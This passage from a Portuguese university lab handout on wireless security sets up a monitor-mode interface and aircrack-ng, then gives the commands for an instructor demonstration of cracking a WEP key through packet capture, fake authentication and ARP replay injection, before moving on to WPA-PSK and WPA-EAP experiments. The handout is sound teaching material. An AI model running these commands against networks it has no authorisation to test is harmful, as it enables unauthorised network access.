  4. Ative interface USB no Virtualbox em Dispositivos->USB
  5. Logue na máquina virtual com usuário aluno e senha aluno
  6. Em um terminal, execute estes comandos:
    sudo systemctl stop apt-daily-upgrade.service
    sudo systemctl stop apt-daily-upgrade.timer
    sudo systemctl stop apt-daily.service
    sudo systemctl stop apt-daily.timer
    sudo systemctl disable apt-daily-upgrade.service
    sudo systemctl disable apt-daily-upgrade.timer
    sudo systemctl disable apt-daily.service
    sudo systemctl disable apt-daily.timer
    
    ... para desativar a atualização automática de pacotes de software no Ubuntu.
  7. Na applet do NetworkManager da máquina virtual, desabilite também a rede wifi (do mesmo jeito que na máquina real)
  8. Use o comando iwconfig para identificar o nome da interface wifi:
    sudo iwconfig
    
  9. Supondo que o nome da interface seja wlx7844a78c2f, execute estes comandos:
    sudo iw dev wlx7844a78c2f interface add mon0 type monitor
    sudo ifconfig mon0 up
    sudo ifconfig wlx7844a78c2f up
    
  10. Instale o software aircrack:
    sudo apt update
    sudo apt install aircrack-ng
    


Experimento

  1. Na introdução deste roteiro se afirmou que o WEP é um modo de segurança com graves falhas, e que não deve ser usado em instalações reais (nem em sua rede doméstica !). Para demonstrar isto será usado o software aircrack-ng (maiores detalhes), que faz a descoberta da chave WEP. Esse software está instalado no computador do professor, de onde será feita uma demonstração. Esta se baseia no tutorial Simple WEP Crack Tutorial, descrito no site oficial do aircrack-ng, e resumidamente segue abaixo:
    • Descubra o endereço MAC do AP, e em um terminal em separado execute este comando para fazer a captura de quadros e salvá-los em arquivos:
      sudo airodump-ng -c 11 --bssid MAC_do_AP -w output mon0
      
    • A interface de rede precisa fazer uma autenticação falsa no AP para poder enviar a ele quadros forjados, que servirão para acelerar a captura de quadros e assim o processo de quebra da chave WEP. O comando a seguir faz essa autenticação:
      sudo aireplay-ng -1 0 -e IER mon0
      
    • O próximo passo é injetar quadros na rede sem-fio, para forçar o AP a respondê-los e assim acelerar a taxa de de quadros capturados. Isso se faz capturando alguma mensagem ARP, e em seguida reinjetando-a na rede. O AP vai retransmiti-la, e com isso pode-se obter um novo quadro encriptado para análise. O comando abaixo executa esse procedimento, e deve ser executado em um terminal em separado:
      sudo aireplay-ng -3 -b MAC_do_AP mon0
      
      Observe que no terminal onde roda o airdump-ng a contagem de quadros coletados deve aumentar rapidamente.
    • Após alguns segundos, deve-se executar este comando:
      aircrack-ng -z -b MAC_do_AP output*.cap
      
      Este último passo deve revelar a chave WEP em uso !

      O aircrack-ng pode ser instalado no Ubuntu, e existem versões para outros sistemas operacionais (inclusive Windows). Existem outros softwares que quebram chaves WEP, mas basta existir um (e de fácil obtenção !) para descartar o WEP como um modo de proteção de redes sem-fio a ser considerado.

Experimento 4: Rede com segurança WPA-PSK

Sendo o WEP inseguro, em ambiente corporativo ou doméstico recomenda-se o uso de WPA. WPA possui basicamente dois modos de autenticação e encriptação: um baseado em chave compartilhada, chamado de WPA-PSK (semelhante ao WEP), e outro baseado em IEEE 802.1x/EAP. No primeiro caso, o uso da chave foi modificado para que cada quadro use uma chave distinta, e de uma forma que seja muito difícil deduzir a próxima chave. No segundo caso, usa-se o framework IEEE 802.1x, porém limitando os métodos EAP possíveis (ex: EAP-TTLS). Assim, para um primeiro experimento deve-se usar WPA-PSK, por ser mais simples.

  1. Configure o AP para usar WPA-PSK, definindo uma chave compartilhada.
  2. Faça com que seu computador novamente se associe à rede sem-fio. Note que agora o supplicant mostra que o mecanismo é WPA-PSK.
  3. A quebra da chave WPA-PSK não pode ser feita de forma tão simples (?!) quanto no caso do WEP. Isto porque no WPA-PSK a chave somente pode ser descoberta por métodos de força bruta: testando diferentes chaves até descobrir a verdadeira. Isto se chama de ataque de força bruta ou, em uma versão um pouco melhorada, ataque baseado em dicionário. O uso de dicionários, que são conjuntos de palavras, pode acelerar a descoberta da chave, se quem a configurou usou uma palavra contida no dicionário de ataque. Isto não é tarefa fácil, e ataques deste tipo usualmente demoram bastante (a não ser que a chave seja trivial !). Para chaves grandes, com muitos caracteres aleatórios (chaves PSK podem ter entre 8 e 63 caracteres), a descoberta é virtualmente impossível. Veja uma discussão sobre isto na página do aircrack-ng. Com isto, concluímos que WPA-PSK, com chaves grandes e aleatórias, pode ser usado com boa margem de segurança.


Experimento 5: rede com segurança do tipo WPA-EAP

  1. Em uma rede com muitos usuários, ou com usuários temporários (ambos casos típicos de empresas), ter uma chave compartilhada como no caso do WPA-PSK não é uma boa estratégia. O melhor é autenticar os usuários individualmente, para que seja fácil identificar quem usou a rede, e para revogar o acesso quando necessário. Assim, o método final de acesso à rede sem-fio se chama WPA-EAP e baseia-se no IEEE 802.1x com EAP, que proporciona a autenticação individual de usuários. Para testá-lo será usado o EAP-TTLS, que primeiro estabelece uma conexão encriptada para em seguida fazer a autenticação com login e senha (com EAP-MD5). A proteção do login e senha com encriptação é fundamental para elevar a segurança do método de acesso (na verdade, a autenticação em redes sem-fio exige que exista encriptação para a transmissão de credenciais). Como visto anteriormente em controle de acesso com IEEE 802.1x em redes cabeadas, há a necessidade de um servidor Radius para a autenticação. Assim, esse servidor Radius deve estar corretamente configurado no computador do professor para aceitar a autenticação com EAP-TTLS.
  2. Use o Network Manager para fazer a autenticação com WPA Enterprise (um apelido para o WPA-EAP) e EAP-TTLS. A identidade deve ser seu_nome, com senha seu_sobrenome. Conecte o supplicant, e verifique se ele consegue fazer a autenticação.
  3. Desconecte da rede sem-fio, e em seguida execute o wireshark. Ponha-o a capturar pacotes na interface wlan, e depois reconecte à rede sem-fio.
    • Quantas mensagens são trocadas entre seu computador e o AP até completar a autenticação ?
    • Quanto tempo levou para fazer a autenticação ?
    • Quais os protocolos envolvidos nessas mensagens ?